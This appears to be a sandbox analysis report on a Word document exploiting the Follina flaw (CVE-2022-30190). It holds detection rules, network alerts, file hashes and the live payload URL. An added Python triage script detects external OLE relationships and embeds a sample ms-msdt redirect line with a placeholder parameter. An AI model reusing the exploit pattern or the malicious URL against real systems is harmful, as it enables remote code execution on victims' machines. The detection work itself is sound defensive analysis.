Windows
Analysis Report
C1ZGt61uGv
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 2960 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
YARA matches (deduplicated; the msdt and ms-msdt URI rules each matched several times):

Rule | Description | Author |
---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | ditekSHen |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
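The two rule families in the table above key on the two halves of the Follina chain: a relationship in word/_rels/document.xml.rels whose OLE object (or attached template) target is external, and an HTML payload that sends the browser control to the ms-msdt: protocol handler with the PCWDiagnostic troubleshooter id. The Python triage script below is an added example written for this page; it is not part of the sandbox report or of the YARA rules it cites. It builds a constructed minimal .docx in memory whose relationship file points at the URL this sample fetched (https://dullghostwhitetwintext.karewen.repl.co/index.html, with the trailing "!" seen in public Follina documents), extracts external oleObject/attachedTemplate relationships, and scans a constructed stand-in for the fetched HTML for the ms-msdt indicators. The relationship id, the HTML snippet and the PLACEHOLDER parameter value are constructed, not taken from the sample.

```python
"""Triage for the two Follina (CVE-2022-30190) indicators the YARA rules
above match: an external oleObject / attachedTemplate relationship in
word/_rels/*.rels, and an ms-msdt: URI in the HTML the document fetches.
Added example for this page; the sample inputs below are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that should point inside the package. An external target
# on these is the remote-template / Follina delivery pattern. Hyperlink
# relationships are external by design and are deliberately not flagged.
SUSPICIOUS_REL_TYPES = {REL_BASE + "oleObject", REL_BASE + "attachedTemplate"}

# URL from this report's IE cache entry; the trailing "!" is the form seen in
# public Follina documents. The relationship id below is a constructed value.
SAMPLE_TARGET = "https://dullghostwhitetwintext.karewen.repl.co/index.html!"


def build_constructed_docx(external_target=""):
    """Constructed minimal OOXML package. With external_target set, its
    document.xml.rels carries an external oleObject relationship."""
    rels = [f'<Relationship Id="rId1" Type="{REL_BASE}styles" Target="styles.xml"/>']
    if external_target:
        rels.append(
            f'<Relationship Id="rId1337" Type="{REL_BASE}oleObject" '
            f'Target="{external_target}" TargetMode="External"/>'
        )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">{"".join(rels)}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def external_rels(docx_bytes):
    """Return each external oleObject/attachedTemplate relationship found in
    any word/_rels/*.rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rtype = rel.get("Type", "")
                if rtype in SUSPICIOUS_REL_TYPES:
                    target = rel.get("Target", "")
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rtype[len(REL_BASE):],
                        "target": target,
                        "bang_suffix": target.endswith("!"),
                    })
    return findings


# Constructed stand-in for the fetched index.html: only the strings the
# ms-msdt rules look for, with the troubleshooter parameter value replaced by
# a placeholder. This is not the payload from the sample.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    '/param \\"IT_RebrowseForFile=PLACEHOLDER\\"";\n'
    "</script></body></html>"
)


def msdt_indicators(html):
    """Flag the ms-msdt protocol-handler pattern in fetched HTML."""
    return {
        "ms_msdt_uri": re.search(r"ms-msdt:/?id\b", html, re.I) is not None,
        "pcw_diagnostic": "PCWDiagnostic" in html,
        "browse_for_file": re.search(r"IT_(?:Re)?browseForFile=", html, re.I) is not None,
        "location_redirect": re.search(r"location(?:\.href)?\s*=", html, re.I) is not None,
    }


def verdict(rel_findings, indicators):
    """Combine both halves of the chain into one triage label."""
    if rel_findings and indicators["ms_msdt_uri"] and indicators["pcw_diagnostic"]:
        return "follina-chain"
    if rel_findings:
        return "external-ole-or-template-relationship"
    if indicators["ms_msdt_uri"]:
        return "ms-msdt-uri-in-html"
    return "no-indicator"


if __name__ == "__main__":
    rels = external_rels(build_constructed_docx(SAMPLE_TARGET))
    for r in rels:
        print(f"{r['part']}: {r['id']} {r['type']} -> {r['target']}")
    ind = msdt_indicators(SAMPLE_HTML)
    print(ind)
    print(verdict(rels, ind))
```

To run this against a real document, pass the file's bytes to external_rels() and the page it fetches to msdt_indicators(). The relationship check is restricted to the oleObject and attachedTemplate types because TargetMode="External" on a hyperlink relationship is normal and would drown the signal in false positives.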
Snort IDS alerts:

Timestamp | SID | Source | Destination | Protocol | Classtype |
---|---|---|---|---|---|
08/18/22-04:23:24.931708 | 2025010 | 35.186.245.55:443 | 192.168.2.22:49176 | TCP | A Network Trojan was detected |
08/18/22-04:23:28.806682 | 2025010 | 35.186.245.55:443 | 192.168.2.22:49181 | TCP | A Network Trojan was detected |
AV Detection |
---|
Signature evidence (values not preserved): Avira ×5; Virustotal ×1 (perma link); Metadefender ×1 (perma link); ReversingLabs ×1 |
Exploits |
---|
Signature evidence (values not preserved): File source ×5; Extracted files from sample ×1; HTTPS traffic detected ×4; File opened ×1; TCP traffic ×339; DNS query ×7 |
Networking |
---|
Signature evidence (values not preserved): Snort IDS ×2; HTTP traffic detected ×7; JA3 fingerprint ×2; HTTPS traffic detected ×4; Network traffic detected ×22; String found in binary or memory ×2; File created ×1; DNS traffic detected ×1 |
System Summary |
---|
Signature evidence (values not preserved): Matched rule ×12; OLE stream indicators for Word, Excel, PowerPoint, and Visio ×1; Virustotal ×1; Metadefender ×1; ReversingLabs ×1; Key opened ×2; LNK file ×1; OLE indicator, Word Document stream ×1; File created ×2; Classification label ×1; OLE document summary ×5; File read ×1; Window detected ×1; File opened ×1; Initial sample ×1 |
Persistence and Installation Behavior |
---|
Signature evidence (values not preserved): Extracted files from sample ×1; Process information set ×63 |
MITRE ATT&CK techniques with matching signatures (unmatched matrix cells omitted):

Tactic | Technique | Matching signatures |
---|---|---|
Execution | Exploitation for Client Execution | 13 |
Defense Evasion | Masquerading | 1 |
Discovery | File and Directory Discovery | 1 |
Discovery | System Information Discovery | 2 |
Command and Control | Encrypted Channel | 1 |
Command and Control | Non-Application Layer Protocol | 3 |
Command and Control | Application Layer Protocol | 14 |
Command and Control | Ingress Tool Transfer | 4 |
Initial sample:

Detection | Scanner | Label |
---|---|---|
46% | Virustotal | |
26% | Metadefender | |
35% | ReversingLabs | Document-Word.Trojan.Minerva |
100% | Avira | W97M/Dldr.Agent.G1 |

Dropped files (4 entries):

Detection | Scanner | Label |
---|---|---|
100% | Avira | JS/CVE-2022-30190.G |
Domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
dullghostwhitetwintext.karewen.repl.co | 35.186.245.55 | true | false | | high |

URLs (names not preserved):

Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | high |

Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
35.186.245.55 | dullghostwhitetwintext.karewen.repl.co | United States | 15169 | GOOGLEUS | false |
34.149.204.188 | unknown | United States | 2686 | ATGS-MMD-ASUS | false |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 686026 |
Start date and time: | 2022-08-18 04:22:09 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | C1ZGt61uGv (renamed file extension from none to docx) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 6 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.expl.evad.winDOCX@1/20@7/2 |
EGA Information: | Failed |
HDC Information: | Failed |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
Context: other samples sharing the same ASN (sample names, SHA-256 values and links not preserved):

Match (ASN) | Associated samples | Detection |
---|---|---|
ATGS-MMD-ASUS | 20 | malicious |
Context: other samples sharing the same JA3 fingerprint (sample names, SHA-256 values and links not preserved):

Match (JA3 fingerprint) | Associated samples | Detection |
---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | 20 | malicious |
7dcce5b76c8b17472d024758970a406b | 20 | malicious |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28773612475316834 |
Encrypted: | false |
SSDEEP: | 24:I3yC/9LC4tB37+KqorUSjnClWnyc8v5TbT/tAZvzKxFcNTRxlQvnS8S9XqJNQSEQ:I35RBzAccmKyTjlJQaxwOr0JZH |
MD5: | FF3458BF59CAB2B33042A43FE7571C5E |
SHA1: | B8B002E94BF658303BE1DA5E7D5FA7670EA882B7 |
SHA-256: | E151CF032E1294178D66CF5D065FD8F0C26D27945195FD34738910D25B6A567D |
SHA-512: | 256C055110B1AA138F19FC4519D05FE158FBCEF88C8E604DECE24FF2AAB6808208E9DED419613436E08DB2429124F131F2E5F81FCDFC3C9C0E1CE1240F0EC212 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{82D6D04A-E2A7-42F1-89A6-CFD57F9EC766}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6745976468464878 |
Encrypted: | false |
SSDEEP: | 768:T5K146vqOVHUvJBmtlK2DrxtlK2DrwZPJl/XDr/klmDr/4xtD+DrbtDlDr:Lhw |
MD5: | 9F01FC48E22641773BC5DB74B89EB0E1 |
SHA1: | B4985AF395531C350958A267B7D81F78AABA57A2 |
SHA-256: | 0E19C09DC2C68235B7C39C13A81A3125C376D9135267CB003B1057285581374B |
SHA-512: | BCA4CA34F6F4DCF49EF55B53FF8C9F1452BCE4A6426B083FC7AFA578CD88C07635E12844AA63319E5CC21128EB2F7FCD1066FD7DAE453A1720333FA41445A9E2 |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.936756154878342 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzXh4NaPlDpKQclkrI8TcOhFYDZ276:yPblzXeWl0J+c8QGFYDZ22 |
MD5: | 508E494841A8C3839E148679A4937283 |
SHA1: | 668677B7DBA2DBD40A596A200D0176B965BD44AE |
SHA-256: | AB0AE8DEF878D06C5F65D16C14B4ACBEE7EED1666584865D90C62E5704B5B48A |
SHA-512: | DABFFDCCE773E059F52E137EAE54621AE36E33CB28A5A6A86CC5E323D23A8ACDB3B8B76CB74CC9BFDFC8586A0D2BF553FE63C40F5B1D3CCB197A6721E1ED644A |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28745721354451365 |
Encrypted: | false |
SSDEEP: | 48:I3sPRBffmW1AEr12ORQopWi3hI9ahlrq1/Tp9oipEGQO09oipEGQOyH:KoLXYErFHI9aXq1DmbBmbvH |
MD5: | 5F39A4DAC8039EB065DD8D063640BC4F |
SHA1: | BBEA611DA4F133FB3F02C273B60D379060ECC49C |
SHA-256: | FA8BE565755B84D32FF994D075AF5002629176DA9771B5CC9C78268C0021BACC |
SHA-512: | 5B983F376F0146604DA61EBED288E016E4DD43EA1A8971D3953DBC8D1B52B5BD22D88B32628A61EC06C784B14AC2B0A5F65AC8B128F3D84422861B0BE9BFBC2D |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{ECAF6FF3-F9CF-495B-80DB-8035DEA309E7}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22075992709284928 |
Encrypted: | false |
SSDEEP: | 48:I3oyQUrB/2aWIeFRmHaaGEW1+7DYd7z1IZuxTV/ZjA/iZjA/J:KoLCjuRQG7ZYuxT/AmAx |
MD5: | B53D2E2D585B0857AAFF3A807DDDFE73 |
SHA1: | 309EB90AD24B5FC926D00B6B16A2DE199522114E |
SHA-256: | EE3835D8BE77FC46EB661A14ADCC3285582CC8774C8F2617922D99D5A13C29CE |
SHA-512: | C8ACE3F93133C5F4C8E257D311DE4F182144F4871EDA19A18DD83BB0E05A433FA37F4440F8DA50C283FD720D6F4860B601B56F91D3C95BF56186674C8DBAE769 |
Malicious: | false |
Reputation: | low |

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.92634307586349 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz2rZjMWjjic+lIHdhHAWelOVG4R7276:yPblzwWDc19SWzk4t22 |
MD5: | 63BA949A4695972C1A0E4D0BEC674841 |
SHA1: | 6002A36601A9EEE1C8B4667761AF8815D4E6D8C9 |
SHA-256: | D5D97F1310E4BFA007D830CA4E1953DF22BE1B797B27692712F5C93E6DBC43DB |
SHA-512: | 2EE603F54070AA54538FCB3F8C541437E1BFA50E3F56380801356069354940FBFCCB116591D59B25D5F435255E0820DBFCB271EF975670FC91BD03D1D7D1A39D |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://dullghostwhitetwintext.karewen.repl.co/index.html |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
Antivirus: |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC592AE0.emf
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 10172 |
Entropy (8bit): | 3.928478624213631 |
Encrypted: | false |
SSDEEP: | 48:q373cifeyUaIWmBJOhTDOj1WN7M60iIiB7rSwVauLM/Myof9NLRgMy7k3e2kW86J:873xeXaIBckry+Ks8D+plS |
MD5: | C349F98D0BBE0D72F9A6E34335918207 |
SHA1: | B2184C336F95E1ED5F338D1B27D06A4F8E1C535F |
SHA-256: | 8ACC7CBE7BEB283D3908F418FB5390623F1EB46018F426D4911F5515E786CAA5 |
SHA-512: | A6DE09C1E4B3947EF4B8BF46B14A3E77AFFB6004EDED3560814720B8304542F1722EFEF83502E0532C76B438015B84200302BE5CE5F8C1228A881F050BE8AE5B |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5901 |
Entropy (8bit): | 4.701941274629396 |
Encrypted: | false |
SSDEEP: | 96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs |
MD5: | 2C855A56E062B197D4CC9D021DF71219 |
SHA1: | C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5 |
SHA-256: | A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD |
SHA-512: | 11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0 |
Malicious: | true |
Yara Hits: |
Antivirus: |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4AF4D387-AD82-4BF6-994E-7F9F57B3DDFD}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5632 |
Entropy (8bit): | 2.181448160411441 |
Encrypted: | false |
SSDEEP: | 48:rMTLxD3U2557fpQ0fpQRiVDaU2557fpQAfpQFi:QTLxD3U2TenAVDaU2Ter0 |
MD5: | 4B4FEA476768A33C0BCF51BCDDB2CCD4 |
SHA1: | 80D924A68CBE3D1CAA003D7180A3FB3713A15F30 |
SHA-256: | 675CDC18EB9F7FA3C1C4287FF4C1CFADFB81B54073AF377D5082BD23B0D472CD |
SHA-512: | 20B06E268A0343D559C140BF525E4C0915EB9B5BDA33D94BC51E5B19EBEE3C725CD2E0D1BF75D34E9E4C984F32E0CA0356D85378CECD8DE1EA44ED38EEB68A24 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92861601-980D-49B7-B60E-86BDABC4A51A}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D894BCB6-25AA-45DC-81E3-B0273BF56D57}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 0.9434685449697431 |
Encrypted: | false |
SSDEEP: | 6:FlIcElClbY/z35lEHaAlPrP5llAabK/O3iuzxyn4PxZUtg:Fl7MClcFlEHaAPrzXKzut8GZz |
MD5: | 4D066506FC8303FE21BD33D70AD15382 |
SHA1: | FBEB98890B56989FBDD274982690F11DA6EF3B8E |
SHA-256: | D210EDD7CC5EEC6A9C3AD9C09B2755B8144C3A5ED44B178FE1EE3A50852E7B38 |
SHA-512: | 05B05479DE9EE50CA74A890D27634A065995D34601343F059B8B66516FAAC79098CB4F9ADABFB3ED5CA763BF67A953260FFAA36D24A3BABC04FBA22BC9541FC5 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.02572382778486038 |
Encrypted: | false |
SSDEEP: | 6:I3DPcrHavxggLRxv26Lt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP2Hc/tRvYg3J/ |
MD5: | FAA9C11C3BF4749CF7FFF72F81103637 |
SHA1: | EA800893E160BDEC41C9E5A208ECDEFD93020DE4 |
SHA-256: | E4FE523DD900A6A9384D518919DC6F46F67E47BA19062D66BC33738FC9D63D7C |
SHA-512: | 89283E5CC4D45C886D88EDFF6DD6D81FFBD9DC643925411851E4EAE034BD56F8C9C60C932D6C8DE3A95DB20D06F0F0A4DBF4081CBFBAA03B174D061BA4A79A66 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025486724730822925 |
Encrypted: | false |
SSDEEP: | 6:I3DPc3vxggLReaZopSdh/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPM6H2PvYg3J/ |
MD5: | DF1D9A5116232C0278742EE1F191FF0C |
SHA1: | 0BA0ABF8406B667D8C632F6B3ED6395430A0E8D1 |
SHA-256: | E4BC1D0AA363F21236E3EDF16C6863CB44D1A3E24B12EC190B33C8F19DF493A9 |
SHA-512: | 35AE70F978C47590A32D185E04AA07C45647D8A9B42E0A1716E6AA1EE075A3F0CFF252FF1853A4C9E474C672F81DAB4022BA3AA37C5FDD1075413668015CB15B |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.541555035737997 |
Encrypted: | false |
SSDEEP: | 12:8mbA80gXg/XAlCPCHaXNBQtB/XAJX+WuvWQK3juicvbTS3tb4GK/NDtZ3YilMMEh:8mb1k/XT9Sk+mNeHS3ADv3q+u7D |
MD5: | 16C92C158C9E519DF7E7171A87BA915B |
SHA1: | 5EA87A76FB2D1CB7776EE3E10902DB4D444EC686 |
SHA-256: | C3556B03AEDC5348C415F365D63B28E0DF81C86D721A2C8D1937AFDC46879F35 |
SHA-512: | BEFC41BCB397B893BFD14392992FC02FAD04AD946493E359E20DF11D3136DD145076148BA88B2BE3471D3709EA6EDC9B56EA90A02DC5F246BEE1E26F87CE183F |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.780851828270855 |
Encrypted: | false |
SSDEEP: | 3:bDuMJl+Uqe3TAlmxWtmx3TAlv:bCne3CE3W |
MD5: | 69F6516C10F77E405479AA56E74F44A0 |
SHA1: | 36194337D22DE7E093B6659C3E3A1C98A2F243CE |
SHA-256: | EFAE2CC5C7CBDFF13D4AC0A4FB3F0C0000C52A4E1C9AD499C834F0135A8ECCFB |
SHA-512: | 3443F8CF1E2804F86512DDDCEC8DF5F0F3683FA2D1E57FC4592E8A13FC7CCC9E402230D71F956DDB8D3873B6825979EB706599CB0F7B2FF32D1A993F31D9451B |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
File type: | |
Entropy (8bit): | 7.316883678675453 |
TrID: |
File name: | C1ZGt61uGv.docx |
File size: | 26614 |
MD5: | 98998af843c2c938c079a102abe6c73d |
SHA1: | b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d |
SHA256: | b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593 |
SHA512: | 4b3fee7cddc41a3f742d2ca3bcc6db766e43d183b926153927ec5591d73cce2d0cf5b4ade9d0f010bf6b104f463d44e383e423984d0bf5684e58971dd0665ee7 |
SSDEEP: | 384:aW5NndAzG46H8kwV1xEw2imBTQUhGnhHpAKIQqRrINxt/ZtNNiW2+30Ony/6MY:awlO1Ew2HGHiKpqRrSxllN2+3By/e |
TLSH: | DCC2C057D12B5C75CC6A4EBCD82C8ABCEA9430D0F9151187244DE6C9B24BD73133EA1A |
File Content Preview: | PK..........!..l.$u...........[Content_Types].xml ...(......................................................................................................................................................................................................... |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Document Type: | OpenXML |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Template: | |
Last Saved By: | |
Revision Number: | 2 |
Total Edit Time: | 0 |
Create Time: | 2022-06-03T10:03:00Z |
Last Saved Time: | 2022-06-03T10:03:00Z |
Number of Pages: | 1 |
Number of Words: | 3 |
Number of Characters: | 18 |
Creating Application: | |
Security: | 0 |
Number of Lines: | 1 |
